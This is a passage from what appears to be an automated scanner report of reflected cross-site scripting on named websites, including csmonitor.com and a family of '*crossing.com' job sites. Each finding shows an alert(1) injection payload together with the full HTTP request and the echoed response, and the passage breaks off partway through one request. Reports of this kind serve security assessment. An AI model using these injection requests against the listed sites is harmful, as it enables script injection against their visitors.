<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/20111ac7e"-alert(1)-"619fa0f46a4/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.44. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96a6"-alert(1)-"8cef4f02abe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast/2011/0105d96a6"-alert(1)-"8cef4f02abe/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:26:04 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:26:05 GMT
Date: Fri, 21 Jan 2011 22:26:05 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/2011/0105d96a6"-alert(1)-"8cef4f02abe/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.45. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60b23"-alert(1)-"9fda35e2e30 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity60b23"-alert(1)-"9fda35e2e30 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:26:15 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86373
Expires: Sat, 22 Jan 2011 22:25:49 GMT
Date: Fri, 21 Jan 2011 22:26:16 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity60b23"-alert(1)-"9fda35e2e30";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.46. http://www.customerservicecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8654b"><script>alert(1)</script>5d8c4dcbe63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8654b"><script>alert(1)</script>5d8c4dcbe63=1 HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eq95mr8o98fkhjs3ktog20fuf3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119276

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.customerservicecrossing.com/?8654b"><script>alert(1)</script>5d8c4dcbe63=1">
...[SNIP]...

3.47. http://www.dbacrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd83"><script>alert(1)</script>ed7396c311c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4fd83"><script>alert(1)</script>ed7396c311c=1 HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eph2bliclbes6e30d2h8tu8tq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125729

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dbacrossing.com/?4fd83"><script>alert(1)</script>ed7396c311c=1">
...[SNIP]...

3.48. http://www.dentalcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0261"><script>alert(1)</script>118fbccd4ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e0261"><script>alert(1)</script>118fbccd4ca=1 HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t7apdouasjul5pdruunarl3np6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111881

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dentalcrossing.com/?e0261"><script>alert(1)</script>118fbccd4ca=1">
...[SNIP]...

3.49. http://www.designingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77f8"><script>alert(1)</script>c45ddc233d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e77f8"><script>alert(1)</script>c45ddc233d5=1 HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=voh1qpdojh74kuvvl210bd7ti4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122755

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.designingcrossing.com/?e77f8"><script>alert(1)</script>c45ddc233d5=1">
...[SNIP]...

3.50. http://www.diversitycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536ad"><script>alert(1)</script>92d710e5331 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?536ad"><script>alert(1)</script>92d710e5331=1 HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mvngm9tnor0sktfdm2him70ht6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135910

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.diversitycrossing.com/?536ad"><script>alert(1)</script>92d710e5331=1">
...[SNIP]...

3.51. http://www.dotnetcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff65"><script>alert(1)</script>d0021da73b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5ff65"><script>alert(1)</script>d0021da73b5=1 HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tcm1i9njojb6ne685f4rk35d16; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111425

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dotnetcrossing.com/?5ff65"><script>alert(1)</script>d0021da73b5=1">
...[SNIP]...

3.52. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dyn-web.com
Path:   /bus/terms.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed13c<a>aca04e604f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bused13c<a>aca04e604f5/terms.html HTTP/1.1
Host: www.dyn-web.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:34:47 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=f71522e635f566773a14ae500b4e2916; path=/
Connection: close
Content-Type: text/html
Content-Length: 5456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Page No
...[SNIP]...
<a>aca04e604f5/">Bused13c<a>aca04e604f5</a>
...[SNIP]...

3.53. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dyn-web.com
Path:   /bus/terms.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a0a"><a>7585948a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bus60a0a"><a>7585948a4e/terms.html HTTP/1.1
Host: www.dyn-web.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:34:39 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=1089af8a8270c6f1de1622faa083f934; path=/
Connection: close
Content-Type: text/html
Content-Length: 5458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Page No
...[SNIP]...
<a href="/bus60a0a"><a>7585948a4e/">
...[SNIP]...

3.54. http://www.ecommercecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4aad"><script>alert(1)</script>8c4d139c8e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b4aad"><script>alert(1)</script>8c4d139c8e9=1 HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qgp06lth3p2j8damhlniukmo55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123070

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.ecommercecrossing.com/?b4aad"><script>alert(1)</script>8c4d139c8e9=1">
...[SNIP]...

3.55. http://www.editingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a2ad"><script>alert(1)</script>a026aea5f67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8a2ad"><script>alert(1)</script>a026aea5f67=1 HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=40ci97cu8vt0v2j4827q3o6no5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.editingcrossing.com/?8a2ad"><script>alert(1)</script>a026aea5f67=1">
...[SNIP]...

3.56. http://www.educationcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53272"><script>alert(1)</script>8ec396783fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?53272"><script>alert(1)</script>8ec396783fa=1 HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5m4pm2cqvrvekdct0vuo061882; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.educationcrossing.com/?53272"><script>alert(1)</script>8ec396783fa=1">
...[SNIP]...

3.57. http://www.employmentcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d32"><script>alert(1)</script>3c4df51b6d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c9d32"><script>alert(1)</script>3c4df51b6d0=1 HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
